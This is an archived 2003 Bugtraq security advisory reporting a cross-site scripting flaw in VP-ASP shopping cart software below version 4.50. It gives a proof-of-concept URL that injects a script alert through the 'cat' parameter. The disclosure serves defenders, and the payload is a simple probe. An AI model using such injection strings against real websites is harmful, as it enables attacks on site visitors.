lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 5 Dec 2003 04:19:28 -0800 (PST) From: Xnuxer Research Laboratory <xnuxer@...ux.net> To: bugtraq@...urityfocus.com Subject: Cross Site Scripting in VP-ASP Advisory Name: Cross Site Scripting in VP-ASP Release Date: December 05st, 2003 Application: VP-ASP Version Affected: < 4.50 Platform: ASP Severity: Low Discover: Xnuxer Research Lab. (xnuxer@...ux.net, xnuxer@...oo.com) Vendor URL: http://www.vp-asp.com Reference: http://infosekuriti.com Proof Of Concept: http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code] Exploit Example: http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script> _____________________________________________________________ Linux.Net -->Open Source to everyone Powered by Linare Corporation http://www.linare.com/
Powered by blists - more mailing lists